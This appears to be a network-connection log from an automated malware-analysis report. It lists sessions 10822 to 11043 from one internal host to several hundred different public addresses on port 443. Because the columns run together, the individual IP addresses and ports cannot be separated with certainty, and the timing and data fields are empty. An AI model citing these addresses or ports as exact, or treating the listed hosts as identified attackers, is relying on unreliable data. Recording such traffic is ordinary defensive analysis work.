                                                10822192.168.2.2341322201.148.98.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10823192.168.2.235584661.112.87.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10824192.168.2.233426848.130.4.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10825192.168.2.2354330166.160.77.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10826192.168.2.235144477.241.108.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10827192.168.2.2355818203.203.56.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10828192.168.2.2341060191.37.9.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10829192.168.2.2333092123.137.167.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10830192.168.2.235325254.1.32.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10831192.168.2.2352618187.116.44.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10832192.168.2.235830253.67.189.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10833192.168.2.2345502160.19.137.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10834192.168.2.233536680.205.6.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10835192.168.2.2359628158.237.6.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10836192.168.2.2353228132.22.196.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10837192.168.2.233771494.83.179.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10838192.168.2.235383496.214.111.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10839192.168.2.233959682.93.201.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10840192.168.2.2355070131.172.4.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10841192.168.2.2341534193.16.125.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10842192.168.2.2347134170.218.31.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10843192.168.2.2348550203.141.147.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10844192.168.2.2345788101.196.49.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10845192.168.2.2353738120.184.206.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10846192.168.2.23342129.214.249.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10847192.168.2.2347188102.207.190.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10848192.168.2.236077885.81.127.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10849192.168.2.2338006196.121.228.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10850192.168.2.233962640.92.43.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10851192.168.2.234723691.194.20.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10852192.168.2.2349148123.240.226.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10853192.168.2.2345870111.176.163.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10854192.168.2.23362504.218.223.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10855192.168.2.2356724219.242.72.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10856192.168.2.2358976145.90.135.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10857192.168.2.2337024197.0.255.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10858192.168.2.2342812105.140.68.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10859192.168.2.2352968102.83.152.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10860192.168.2.234775664.244.138.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10861192.168.2.233320696.38.24.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10862192.168.2.2347644154.123.135.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10863192.168.2.234641696.141.17.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10864192.168.2.235091417.143.154.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10865192.168.2.2333854198.15.202.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10866192.168.2.2349832133.13.3.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10867192.168.2.234783852.175.13.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10868192.168.2.2353988160.103.115.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10869192.168.2.234783671.61.155.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10870192.168.2.233747870.37.57.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10871192.168.2.234542885.145.34.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10872192.168.2.2360854113.49.52.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10873192.168.2.2343874126.156.80.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10874192.168.2.235577837.42.36.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10875192.168.2.234516487.247.155.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10876192.168.2.2356262148.255.160.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10877192.168.2.233996832.152.25.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10878192.168.2.235615254.44.130.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10879192.168.2.2345960199.92.28.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10880192.168.2.235641468.198.181.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10881192.168.2.234724227.232.45.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10882192.168.2.234163034.116.89.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10883192.168.2.233806497.36.180.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10884192.168.2.235317457.73.244.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10885192.168.2.235345094.39.111.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10886192.168.2.234484490.124.169.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10887192.168.2.234525087.122.149.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10888192.168.2.2345784223.24.106.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10889192.168.2.2359610170.81.131.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10890192.168.2.2339056118.36.0.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10891192.168.2.2358276109.189.9.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10892192.168.2.233824436.239.250.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10893192.168.2.2355328121.103.102.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10894192.168.2.2341228212.3.233.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10895192.168.2.2350592112.132.36.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10896192.168.2.233375842.41.1.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10897192.168.2.2342664125.150.56.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10898192.168.2.233828666.116.46.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10899192.168.2.2353774113.18.25.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10900192.168.2.2352758193.217.113.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10901192.168.2.233378452.223.68.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10902192.168.2.2358080194.94.218.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10903192.168.2.2338642149.227.240.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10904192.168.2.2341732222.79.131.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10905192.168.2.2351946149.168.159.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10906192.168.2.2360454184.137.106.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10907192.168.2.234145281.118.97.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10908192.168.2.235347623.145.139.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10909192.168.2.234963025.119.64.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10910192.168.2.235237474.91.253.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10911192.168.2.2358060161.255.109.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10912192.168.2.234284660.108.217.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10913192.168.2.2343208130.56.129.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10914192.168.2.2350860186.233.134.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10915192.168.2.233808036.41.25.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10916192.168.2.2353846176.220.9.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10917192.168.2.2340002120.137.123.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10918192.168.2.23385581.38.209.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10919192.168.2.234012863.22.56.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10920192.168.2.23372948.65.150.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10921192.168.2.234029891.221.211.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10922192.168.2.233815283.9.110.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10923192.168.2.2348296124.39.192.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10924192.168.2.2356196122.113.165.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10925192.168.2.234442281.175.112.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10926192.168.2.233642265.137.248.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10927192.168.2.2338156153.197.138.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10928192.168.2.234190889.26.31.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10929192.168.2.2332842194.95.12.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10930192.168.2.2357720207.186.93.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10931192.168.2.2359780145.135.147.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10932192.168.2.2338564206.148.129.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10933192.168.2.235413850.126.246.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10934192.168.2.2355086149.112.207.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10935192.168.2.2354694187.90.139.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10936192.168.2.2333198200.15.128.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10937192.168.2.2342704178.149.65.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10938192.168.2.235552424.99.147.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10939192.168.2.23417948.26.237.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10940192.168.2.2359694119.255.37.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10941192.168.2.2336350197.229.200.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10942192.168.2.2349836161.42.226.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10943192.168.2.233800282.122.109.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10944192.168.2.235548094.43.130.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10945192.168.2.2356066222.197.30.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10946192.168.2.2347686123.177.67.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10947192.168.2.234286018.69.212.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10948192.168.2.2360156197.128.147.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10949192.168.2.2340574100.155.161.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10950192.168.2.234120018.251.30.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10951192.168.2.235851227.22.117.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10952192.168.2.233716271.201.75.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10953192.168.2.2342708155.172.70.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10954192.168.2.2334458139.96.29.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10955192.168.2.235387457.38.191.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10956192.168.2.2346816114.102.121.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10957192.168.2.236042096.187.42.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10958192.168.2.235575842.43.64.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10959192.168.2.2343176200.3.141.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10960192.168.2.23448605.127.65.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10961192.168.2.2349844189.222.140.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10962192.168.2.2354052159.89.234.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10963192.168.2.2352596203.63.85.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10964192.168.2.2339010112.4.52.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10965192.168.2.2333718120.52.215.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10966192.168.2.235300657.244.156.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10967192.168.2.23496085.240.107.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10968192.168.2.2356380189.10.5.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10969192.168.2.23382328.77.171.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10970192.168.2.2343158223.64.29.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10971192.168.2.234183046.216.153.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10972192.168.2.2351806125.209.220.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10973192.168.2.2351990157.47.108.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10974192.168.2.2354992211.247.159.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10975192.168.2.233341887.169.221.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10976192.168.2.234638045.252.61.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10977192.168.2.2334412100.22.100.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10978192.168.2.23530545.5.76.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10979192.168.2.2337338204.11.162.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10980192.168.2.2347404141.86.179.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10981192.168.2.2333858129.22.239.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10982192.168.2.2339610205.34.13.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10983192.168.2.2352192163.241.98.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10984192.168.2.2353244166.207.221.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10985192.168.2.2344784157.172.123.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10986192.168.2.2347658219.211.180.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10987192.168.2.235574237.11.231.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10988192.168.2.2356028138.209.111.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10989192.168.2.2355520220.12.115.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10990192.168.2.233827271.189.50.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10991192.168.2.2348394209.161.217.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10992192.168.2.233613259.24.86.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10993192.168.2.2344522218.22.90.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10994192.168.2.2335916144.133.122.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10995192.168.2.233299864.177.66.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10996192.168.2.2356746116.144.191.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10997192.168.2.2342384178.24.35.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10998192.168.2.2345062171.120.42.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10999192.168.2.2357028117.253.163.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11000192.168.2.235747012.217.134.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11001192.168.2.2344256124.253.202.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11002192.168.2.2339090165.94.144.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11003192.168.2.233739097.206.73.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11004192.168.2.235087678.52.8.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11005192.168.2.2356592161.248.83.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11006192.168.2.23605082.69.23.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11007192.168.2.233445662.148.4.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11008192.168.2.234833834.198.15.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11009192.168.2.2337096134.40.217.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11010192.168.2.2355440213.78.71.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11011192.168.2.2332846175.207.76.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11012192.168.2.2360736219.140.128.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11013192.168.2.2355338139.64.83.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11014192.168.2.235272461.75.50.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11015192.168.2.233511693.193.239.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11016192.168.2.233494889.143.4.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11017192.168.2.234157844.170.150.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11018192.168.2.2352532115.182.33.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11019192.168.2.234016692.17.155.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11020192.168.2.2358482119.85.246.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11021192.168.2.235559474.26.220.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11022192.168.2.2353302147.235.214.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11023192.168.2.23465445.30.249.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11024192.168.2.2342980200.81.175.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11025192.168.2.235347897.202.47.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11026192.168.2.2348790196.98.127.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11027192.168.2.234954223.104.61.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11028192.168.2.2340186162.111.249.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11029192.168.2.235113086.234.235.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11030192.168.2.234775613.161.47.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11031192.168.2.234352866.232.170.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11032192.168.2.234343017.110.28.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11033192.168.2.2350900101.137.17.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11034192.168.2.235213864.101.230.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11035192.168.2.2335282153.243.162.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11036192.168.2.2349612112.253.10.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11037192.168.2.234776023.247.174.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11038192.168.2.2340738120.197.133.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11039192.168.2.2350420109.172.35.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11040192.168.2.2338608195.215.180.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11041192.168.2.233326080.91.175.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11042192.168.2.2336984167.185.128.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11043192.168.2.2334222159.220.97.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
